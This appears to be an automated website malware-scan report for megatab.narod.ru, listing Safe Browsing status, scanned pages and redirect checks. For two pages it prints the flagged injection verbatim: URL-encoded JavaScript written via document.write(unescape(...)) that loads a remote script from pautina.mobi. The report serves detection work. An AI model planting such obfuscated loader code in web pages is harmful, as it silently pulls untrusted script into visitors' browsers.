Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=megatab.narod.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://megatab.narod.ru/ | 200 OK Content-Length: 17586 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var arr = new Array(); var arr2 = new Array(); var mexit; var rnd; document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%27%6A%61%76%61%73%63%72%69%70%74%27%20%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%70%61%75%74%69%6E%61%2E%6D%6F%62%69%2F%37%70%67%30%74%37%34%34%69%73%63%38%33%62%63%36%76%6A%36%74%35%67%78%6B%32%72%7A%69%33%78%31%27%3E%3C%2F%73%63%72%69%70%74%3E')); arr[0] = '< for (var i=0; i < 12; i++) { mexit = false; while (mexit == false) { rnd = Math.floor(Math.random() * arr.length); mexit=true; for (var x=0; x < i+1; x++) { if (arr2[x] == rnd) {mexit=false}; }; }; arr2[i] = rnd; } Antivirus reports:
| ||
http://megatab.narod.ru/abnl/?adsdata=PrJlvF4qc;xG4I43W5I!PsWHNKXRbc7fJGieBsnX2d7qZxACYKmmH;lZZiKaPSFTYR;!c1bLOrNKqiA68JgzFCswQerkdTNdmzf0Gm0RZn7b2nB5sBYScJTx30piLVP!RuwGO1Dibc9o | 200 OK Content-Length: 2753 Content-Type: application/javascript | clean |
http://megatab.narod.ru/script.js | 200 OK Content-Length: 905 Content-Type: text/javascript | clean |
http://megatab.narod.ru/index.html | 200 OK Content-Length: 17590 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var arr = new Array(); var arr2 = new Array(); var mexit; var rnd; document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%27%6A%61%76%61%73%63%72%69%70%74%27%20%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%70%61%75%74%69%6E%61%2E%6D%6F%62%69%2F%37%70%67%30%74%37%34%34%69%73%63%38%33%62%63%36%76%6A%36%74%35%67%78%6B%32%72%7A%69%33%78%31%27%3E%3C%2F%73%63%72%69%70%74%3E')); arr[0] = '< for (var i=0; i < 12; i++) { mexit = false; while (mexit == false) { rnd = Math.floor(Math.random() * arr.length); mexit=true; for (var x=0; x < i+1; x++) { if (arr2[x] == rnd) {mexit=false}; }; }; arr2[i] = rnd; } Antivirus reports:
| ||
http://megatab.narod.ru/abnl/?adsdata=uX02azg65267YTYq0XCll15frF6IemmOAUAHfUsTn1ASGlTSSnbaD;2LxesxT5;3WvL!NPayX!!zEl1vSWBbnMS04uYhMU^8Uw2Fbxq2Q75LxPIVSYDQlLsU9Zzt^7!5yvMN3Hndza4KDgoo | 200 OK Content-Length: 2753 Content-Type: application/javascript | clean |
http://megatab.narod.ru/drugie/ | 200 OK Content-Length: 8838 Content-Type: text/html | clean |
http://megatab.narod.ru/abnl/?adsdata=ZjXq!Ki7^uaMynwS^5Su40DWSGGz6hrfyuNhkg8hnnFAlY5xQCC5Fw^WHzMzSyIDP44JrzLvL4wsm4dOb6q0YrhzOxjPMe5aWiuWh;Xtx^yYrnxI^qjXY86tBdVy3KJCLqgjeX5BBJkufwoo | 200 OK Content-Length: 2713 Content-Type: application/javascript | clean |
http://pautina.mobi/7pg0t744isc83bc6vj6t5gxk2rzi3x1 | 200 OK Content-Length: 8472 Content-Type: text/javascript | clean |
http://megatab.narod.ru/a/ | 200 OK Content-Length: 8887 Content-Type: text/html | clean |
http://megatab.narod.ru/abnl/?adsdata=!sj!Wa56StJ8m!^R2ZhBYbrtpVDS87v8bhpcDSX;sxKBnC^eQsB6WxmqD5Jx6FmNajFc0f8pem8wPiZPFl0^SnJ67DIdn;LBQEVfgOk4cX5NrtX7OX1vrm0YlJsS2O5Yn7nTWTH!ChgJf1nU | 200 OK Content-Length: 2741 Content-Type: application/javascript | clean |
http://megatab.narod.ru/b/ | 200 OK Content-Length: 8875 Content-Type: text/html | clean |
http://megatab.narod.ru/abnl/?adsdata=;t6jgM3D4jwYLJ3nGhKuSGNXZRTyYOJzOH1PhnXbiQKekD759Dv^4KSPbfwKIa2RInBPQGR4LGZmV8ZpNYcGHanveiZrW3EahhMtCmKOJdgPKx^pWrWdHXgrKiaNapgVX0!URTjyDIeREFPV | 200 OK Content-Length: 2725 Content-Type: application/javascript | clean |
http://megatab.narod.ru/c/ | 200 OK Content-Length: 8866 Content-Type: text/html | clean |
http://megatab.narod.ru/abnl/?adsdata=0v5ZMBZ9ujmLBfK8Y8vITuh2CAztpWslQaQXc8iyPFThmU;!meA2eaTy3nm;mhefJSigRxGTRTGT6OcXmdv3u4EHGtOzrw!gfiX^WzOri;iab2sFiGP09IXM;49NdbR6CnOcx3zuQMvz | 200 OK Content-Length: 2741 Content-Type: application/javascript | clean |
http://megatab.narod.ru/d/ | 200 OK Content-Length: 8880 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: megatab.narod.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 16:03:35 GMT
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
GET / HTTP/1.1
Host: megatab.narod.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 16:03:35 GMT
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Second query (visit from search engine):
GET / HTTP/1.1
Host: megatab.narod.ru
Referer: http://www.google.com/search?q=megatab.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: megatab.narod.ru
Referer: http://www.google.com/search?q=megatab.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.